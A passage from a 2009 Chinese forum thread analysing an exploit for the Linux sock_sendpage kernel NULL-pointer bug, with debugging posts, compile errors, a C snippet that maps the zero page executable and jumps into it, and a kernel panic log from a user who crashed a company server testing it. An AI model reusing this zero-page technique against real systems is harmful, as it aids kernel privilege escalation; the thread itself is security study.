新爆内核高危漏洞sock_sendpage的利用分析的讨论 [复制链接]

论坛徽章:: 0

51楼 [报告]

发表于 2009-08-26 15:18 |只看该作者

实际上之前我还发过一个exploit的例子，里面是return int的。这个kernel_code()最后返回会到调用send_page()的地方。

但是，现在还有一个问题，就是之前说的问题，kernel_code()中调用C库中的memcpy()的问题，这个问题该如何解释？

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

kouu

家境小康

论坛徽章:: 0

52楼 [报告]

发表于 2009-08-26 16:26 |只看该作者

回复 #51 CUDev 的帖子

呵呵，我还是觉得在kernel_code()函数中调用C库的函数是可以的~

本来打算验证一下的，上次做了一下实验，ubuntu直接就整个挂起了（屏幕定格、无任何响应），也不知道是什么问题。感觉在PC上做这种事情实在太恶心…… 以前都是在嵌入式开发版上搞的，随便折腾。可惜现在没这个环境了……

也希望哪位朋友有兴趣的话验证一下，给个结论~ 呵呵

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

CUDev

家境小康

论坛徽章:: 0

53楼 [报告]

发表于 2009-08-26 23:09 |只看该作者

Robert Love的LKD中：

与用户空间的应用程序不同，内核是不能链接使用标准C函数库（其他的那些库也不行）。造成这种情况的原因有很多，其中就包括先有鸡还是先有蛋的这个悖论。不过最主要的原因在于速度和大小。对于内核来讲，完整的C库太大了------即便是从中抽取出一个合适的子集------大小和效率都不能被接收。

像printf这样的库函数，应该是不能在Kernel中直接call的。但是其他一些函数，它们的实现不进行系统调用，有些理论上是可以的。但是，在动态编译的时候，想memset()这样的地址是如何搞定的呢？难道加载器在内核态运行，解析符号地址？

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

cugb_cat

版主

论坛徽章:: 0

54楼 [报告]

发表于 2009-08-27 13:51 |只看该作者

这个代码在64位系统下编不过啊。。汇编器报错了

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

Godbach

版主

论坛徽章:: 36

55楼 [报告]

发表于 2009-08-27 14:20 |只看该作者

原帖由 cugb_cat 于 2009-8-27 13:51 发表
这个代码在64位系统下编不过啊。。汇编器报错了

cat把错误信息贴出来，以便熟悉汇编的朋友给出解释。。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

cugb_cat

版主

论坛徽章:: 0

56楼 [报告]

发表于 2009-08-27 14:23 |只看该作者

原帖由 Godbach 于 2009-8-27 14:20 发表

cat把错误信息贴出来，以便熟悉汇编的朋友给出解释。。

mqq@208_96:/tmp> ./run.sh
/tmp/ccXvMmLd.s: Assembler messages:
/tmp/ccXvMmLd.s:12: Error: Incorrect register `%rax' used with `l' suffix
/tmp/ccXvMmLd.s:120: Error: Incorrect register `%rdx' used with `l' suffix
/tmp/ccXvMmLd.s:120: Error: Incorrect register `%rax' used with `l' suffix

复制代码

mqq@208_96:/tmp> uname -a
Linux 208_96 2.6.16.60-0.21-******64-090415 #7 SMP Wed Apr 15 09:25:02 CST 2009 x86_64 x86_64 x86_64 GNU/Linux

复制代码

mqq@208_96:/tmp> gcc -v
Using built-in specs.
Target: x86_64-suse-linux
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 --enable-languages=c,c++,objc,fortran,obj-c++,java,ada --enable-checking=release --with-gxx-include-dir=/usr/include/c++/4.1.2 --enable-ssp --disable-libssp --disable-libgcj --with-slibdir=/lib64 --with-system-zlib --enable-shared --enable-__cxa_atexit --enable-libstdcxx-allocator=new --program-suffix= --enable-version-specific-runtime-libs --without-system-libunwind --with-cpu=generic --host=x86_64-suse-linux
Thread model: posix
gcc version 4.1.2 20070115 (prerelease) (SUSE Linux)

复制代码

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

Godbach

版主

论坛徽章:: 36

57楼 [报告]

发表于 2009-08-27 14:28 |只看该作者

能不能将32位上编译出来的那个可执行文件直接放在64位上试一下？

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

cugb_cat

版主

论坛徽章:: 0

58楼 [报告]

发表于 2009-08-27 14:53 |只看该作者

原帖由 Godbach 于 2009-8-27 14:28 发表
能不能将32位上编译出来的那个可执行文件直接放在64位上试一下？

mmap出错。。。
但是这个代码在64位系统上编译后，是可以成功的：

#include <stdio.h>
#include <sys/personality.h>
#include <sys/mman.h>
typedef void test();
void testfn()
{
printf("testfn success\n");
}
int main(int argc, char **argv)
{
void *mem;
//personality(PER_SVR4);
if ((personality(0xffffffff)) != PER_SVR4) {
mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem != NULL) {
/* for old kernels with SELinux that don't allow RWX anonymous mappings
luckily they don't have NX support either ;) */
mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem != NULL) {
fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
return 1;
}
}
} else {
int ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
if (ret == -1) {
fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
return 1;
}
}
printf("success\n");
*(char *)0 = '\x90';
*(char *)1 = '\xe9';
*(unsigned long *)2 = (unsigned long)&testfn - 6;
((test *)0)();
return 0;
}

复制代码

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

vbs100

丰衣足食

论坛徽章:: 1

59楼 [报告]

发表于 2009-08-28 16:45 |只看该作者

大家测试要小心了刚把公司一个8 cpu的服务嚣搞挂掉了

$ uname -a
Linux RD 2.6.9-78.ELsmp #1 SMP Wed Jul 9 15:39:47 EDT 2008 i686 i686 i386 GNU/Linux
$ cat /proc/cpuinfo
...
processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5405 @ 2.00GHz
stepping : 10
cpu MHz : 2000.129
cache size : 6144 KB
physical id : 1
siblings : 4
core id : 7
cpu cores : 4
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe lm constant_tsc pni monitor ds_cpl tm2 xtpr
bogomips : 4000.12

复制代码

Aug 28 14:50:19 RD kernel: CSLIP: code copyright 1989 Regents of the University of California
Aug 28 14:50:19 RD kernel: PPP generic driver version 2.4.2
Aug 28 14:50:19 RD kernel: NET: Registered protocol family 24
Aug 28 14:50:19 RD kernel: Unable to handle kernel paging request at virtual address 0000a206
Aug 28 14:50:19 RD kernel:  printing eip:
Aug 28 14:50:19 RD kernel: 08048803
Aug 28 14:50:19 RD kernel: *pde = 36847001
Aug 28 14:50:19 RD kernel: Oops: 0000 [#1]
Aug 28 14:50:19 RD kernel: SMP
Aug 28 14:50:19 RD kernel: Modules linked in: pppoe pppox ppp_generic slhc parport_pc lp parport autofs4 i2c_dev i2c_core sunrpc cpufreq_powersave ib_srp ib_sdp ib_ipoib rdma_ucm rdma_cm iw_cm ib_addr ib_umad ib_ucm ib_uverbs ib_cm ib_sa ib_mad ib_core dm_mirror dm_multipath dm_mod button battery ac md5 ipv6 joydev ehci_hcd uhci_hcd i5000_edac edac_mc hw_random bnx2 ext3 jbd ata_piix libata cciss sd_mod scsi_mod
Aug 28 14:50:19 RD kernel: CPU: 0
Aug 28 14:50:19 RD kernel: EIP: 0060:[<08048803>] Not tainted VLI
Aug 28 14:50:19 RD kernel: EFLAGS: 00010293 (2.6.9-78.ELsmp)
Aug 28 14:50:19 RD kernel: EIP is at 0x8048803
Aug 28 14:50:19 RD kernel: eax: 0000a206 ebx: f8d084a0 ecx: 00000000 edx: c17e3f60
Aug 28 14:50:19 RD kernel: esi: d495ec80 edi: e9665f50 ebp: e9665e88 esp: e9665e74
Aug 28 14:50:19 RD kernel: ds: 007b es: 007b ss: 0068
Aug 28 14:50:19 RD kernel: Process exploit (pid: 4292, threadinfo=e9665000 task=d576c1f0)
Aug 28 14:50:19 RD kernel: Stack: 0000a206 0000a206 0000a206 00000000 f8d084a0 00001000 c028378a 00001000
Aug 28 14:50:19 RD kernel:       00000000 c035d420 00001000 c01420cb 00001000 f57fc0e4 00000000 c035d420
Aug 28 14:50:20 RD kernel:       00000000 c17e3f60 00000000 00000000 c0141a97 00001000 fffcfc50 00001000
Aug 28 14:50:20 RD kernel: Call Trace:
Aug 28 14:50:20 RD kernel:  [<c028378a>] sock_sendpage+0x37/0x3c
Aug 28 14:50:20 RD kernel:  [<c01420cb>] file_send_actor+0x30/0x49
Aug 28 14:50:20 RD kernel:  [<c0141a97>] do_generic_mapping_read+0x1b2/0x445
Aug 28 14:50:20 RD kernel:  [<c0174b9e>] notify_change+0x25e/0x268
Aug 28 14:50:20 RD kernel:  [<c0142128>] generic_file_sendfile+0x44/0x57
Aug 28 14:50:20 RD kernel:  [<c014209b>] file_send_actor+0x0/0x49
Aug 28 14:50:20 RD kernel:  [<c015d034>] do_sendfile+0x24a/0x290
Aug 28 14:50:20 RD kernel:  [<c014209b>] file_send_actor+0x0/0x49
Aug 28 14:50:20 RD kernel:  [<c015d122>] sys_sendfile+0xa8/0xb4
Aug 28 14:50:20 RD kernel:  [<c02e09db>] syscall_call+0x7/0xb
Aug 28 14:50:20 RD kernel: Code:  Bad EIP value.
Aug 28 14:50:20 RD kernel:  <0>Fatal exception: panic in 5 seconds
Aug 28 16:29:14 RD syslogd 1.4.1: restart.
Aug 28 16:29:14 RD syslog: syslogd startup succeeded